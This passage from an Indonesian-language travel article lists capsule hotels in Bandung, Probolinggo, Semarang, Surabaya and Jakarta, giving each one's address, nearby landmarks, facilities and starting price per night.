Mereka juga punya kolam renang lho, seru kan! Untuk lokasinya sendiri, hotel ini cukup strategis karena hanya berjarak sekitar 1,3 km dari Braga City Walk dan 1 km dari Istana Merdeka. Salah satu yang menarik dari hotel ini adalah karena terletak di lantai yang tinggi, kamu bisa menikmati pemandangan spesial ke kota Bandung.

Harganya mulai dari 100 ribu kamu sudah bisa menginap di sini. Kalau kamu mau kapsul dengan pemandangan ke kota Bandung, kamu cukup merogoh kocek mulai dari 120 ribu saja.

2. Whiz Capsule Hotel Grand Bromo, Probolinggo.

Single bed capsule.

Kamu bisa mencoba untuk menginap hotel kapsul yang ada di Probolinggo, yaitu Whiz Capsule Hotel Grand Bromo. Kamu bisa mengunjungi hotel kapsul ini di Jl. Raya Bromo, Sukapura. Lokasi kapsul hotel ini berada 21 km dari Taman Nasional Bromo Tengger Semeru di Ngadisari dan juga 37 km dari bandara Abdul Rachman Saleh.

Fasilitas yang ditawarkan hotel kapsul ini juga cukup banyak, seperti WiFi gratis, kolam renang, bar dan masih banyak yang lainnya. Teknologi yang disediakan di setiap kapsulnya sangat canggih dan menarik untuk dicoba. Desain setiap ruangannya dan kamarnya juga sangat unik, yaitu seperti kamu sedang berada di pesawat ruang angkasa.

Hotel kapsul ini juga cukup terjangkau. Berdasarkan situ-situs booking online, untuk bisa menginap di Whiz Capsule Hotel Grand Bromo, kamu harus mengeluarkan budget mulai dari 150 ribu rupiah.

3. The Capsule Gajahmada, Semarang.

Single bed capsule.

Di Semarang juga ada hotel kapsul dengan harga yang sangat terjangkau. The Capsule Gajahmada bisa ditemukan di Jalan Gajahmada No.68B, Kebangsari. Lokasinya cukup strategis dari berbagai tempat seperti Lawang Sewu yang berjarak 1.37 km, Ciputra Mall Semarang 1.34 km dan juga Universitas Diponegoro 2.18 km.

Di sini juga tersedia WiFi gratis dan layanan resepsionis selama 24 jam. Hotel kapsul ini sangat cocok untuk kalian para pelancong yang ingin mengabiskan uang seminimum mungkin. Untuk menginap di hotel kapsul ini, kamu hanya perlu mengeluarkan uang mulai dari 60 ribu rupiah saja per-malam.

4. Tab Capsule Hotel, Surabaya.

Single bed capsule.

Setelah Semarang, sekarang saatnya kita pergi ke Surabaya. Di Surabaya, ada salah satu hotel kapsul yang sangat sayang untuk dilewatkan yaitu Tab Capsule Hotel. Lokasi hotel ini ada di Jl. Kayon Blok B No.11, Embong Kaliasin, Genteng. Tempatnya bisa dibilang cukup strategis karena dekat dengan pusat kota, yaitu sekitar 5 menit saja. Hotel ini juga hanya 30 menit dari bandara International Juanda serta sekitar 5 menit dari beberapa pusat perbelanjaan.

Untuk fasilitasnya, di sini tersedia WiFi gratis, pendingin ruangan dan juga kamu bakal dapat perlengkapan mandi yang akan diletakan di capsule pribadi kamu. Hotel kapsul ini mengusung tema minimalis dan futuristic yang artinya memiliki teknologi yang cukup memuaskan. Untuk menginap di hotel kapsul ini, kamu tidak perlu merogoh kocek dalam-dalam karena harganya dimulai dari 150 ribu saja.

5. Capsule Hotel Old Batavia, Jakarta.

Single bed capsules.

Hotel kapsul yang terakhir ini ada di Ibu Kota Jakarta, tepatnya di Jl. Cikini Raya No. 60Z. Lokasi hotel kapsul ini juga cukup strategis karena berada di tengah kota, seperti Stasiun Cikini yang berjarak hanya 2 menit, Stasiun Gambir berjarak 2.1 km, Taman Monas 2.4 km, Museum Gajah 2.7 km dan masih banyak lainnya.

Fasilitas yang ditawarkan juga cukup beragam seperti TV kabel, WiFi gratis, teras dan loungebersama. Meskipun terletak di tengah kota, kamu tidak perlu khawatir dengan harga yang mahal. Harga yang ditawarkan Capsule Hotel Old Batavia cukup terjangkau yaitu mulai 100 ribu saja.

Hotel kapsul ala Jepang bisa kamu temukan di Indonesia. Dengan konsep yang unik dan harga yang terjangkau, pastinya menginap di hotel kapsul akan menjadi pengalaman baru yang menyenangkan. Kalau kamu ingin pergi dengan teman atau pasangan agar lebih seru, kamu bisa banget menyewa capsule dengan double bed.